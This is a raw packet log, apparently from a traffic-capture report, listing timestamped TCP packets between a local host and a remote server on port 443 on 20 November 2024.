                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617471933 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617490053 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617571115 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617582083 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617594004 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.617624998 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.621597052 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.621613979 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.621680021 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.621687889 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.621725082 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.625896931 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.625914097 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.625977039 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.625986099 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.626025915 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.642956972 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.642978907 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.643091917 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.643102884 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.643146992 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.689444065 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.689464092 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.689590931 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.689620018 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.689662933 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.693691969 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.693706989 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.693794966 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.693804026 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.693841934 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.697149038 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.697166920 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.697228909 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.697237968 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.697278023 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.700419903 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.700438023 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.700491905 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.700500965 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.700536966 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.704391956 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.704413891 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.704467058 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.704476118 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.704513073 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.706362963 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.706381083 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.706437111 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.706444025 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.706480980 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.709907055 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.709923983 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.709985971 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.709995031 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.710017920 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.710037947 CET49705443192.168.2.5198.252.105.91
Timestamp                          Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 10:24:34.729504108 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.729522943 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.729640961 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.729671001 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.729716063 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.776614904 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.776643038 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.776726961 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.776762962 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.776810884 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.779562950 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.779582977 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.779674053 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.779684067 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.779728889 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.782408953 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.782428026 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.782627106 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.782635927 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.782676935 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.785072088 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.785090923 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.785178900 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.785188913 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.785233974 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.786950111 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.786971092 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.787038088 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.787054062 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.787100077 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.788846970 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.788863897 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.788932085 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.788942099 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.788983107 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.791549921 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.791570902 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.791640997 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.791650057 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.791693926 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.818773031 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.818800926 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.818947077 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.818965912 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.819020987 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.866056919 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.866075993 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.866173983 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.866200924 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.866292000 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.868469000 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.868489027 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.868576050 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.868586063 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.868626118 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.870315075 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.870332956 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.870421886 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.870431900 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.870495081 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.873131037 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.873153925 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.873224020 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.873249054 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.873291969 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.875031948 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.875056028 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.875149965 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.875161886 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.875200033 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.876732111 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.876750946 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.876852989 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.876880884 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.876936913 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.903762102 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.903785944 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.903841972 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.903914928 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.903939009 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.903970957 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.904014111 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.952513933 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.952532053 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.952697039 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.952708960 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.952778101 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.954931021 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.954950094 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.955032110 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.955043077 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.955084085 CET  49705        443        192.168.2.5      198.252.105.91
Nov 20, 2024 10:24:34.956839085 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.956860065 CET  443          49705      198.252.105.91   192.168.2.5
Nov 20, 2024 10:24:34.956918001 CET  49705        443        192.168.2.5      198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.956926107 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.956962109 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.959531069 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.959552050 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.959613085 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.959621906 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.959666014 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.961311102 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.961330891 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.961405993 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.961414099 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.961446047 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.963018894 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.963038921 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.963095903 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.963103056 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.963144064 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.990808010 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.990844965 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.990900993 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.990943909 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.990991116 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.991007090 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.991076946 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.037306070 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.037331104 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.037436962 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.037447929 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.038973093 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.038992882 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.039042950 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.039052963 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.039084911 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.041399956 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.041414976 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.041471958 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.041481018 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.043135881 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.043154955 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.043193102 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.043200016 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.043262005 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.045734882 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.045749903 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.045819998 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.045870066 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.045886993 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.047519922 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.047538996 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.047589064 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.047612906 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.047626972 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.078545094 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.078567982 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.078722954 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.078748941 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.080538034 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.080571890 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.080610037 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.080625057 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.080651999 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124351978 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124380112 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124504089 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124525070 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124540091 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.124591112 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.125683069 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.125699043 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.125758886 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.125773907 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.301611900 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.303253889 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.303277969 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.303329945 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.303337097 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.303371906 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304013014 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304028988 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304074049 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304080009 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304105043 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.304126024 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.336553097 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.336575031 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.336659908 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.336698055 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.336740971 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.337362051 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.337380886 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.337444067 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.337451935 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.337490082 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.384962082 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.384985924 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.385108948 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.385128975 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386133909 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386183977 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386209011 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386235952 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386241913 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.386276007 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.387003899 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.387018919 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.387062073 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.387068987 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.387100935 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.388127089 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.388143063 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.388184071 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.388190031 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.388217926 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.389050961 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.389066935 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.389110088 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.389115095 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.389142990 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.390031099 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.390045881 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.390084028 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:35.390089989 CET44349705198.252.105.91192.168.2.5
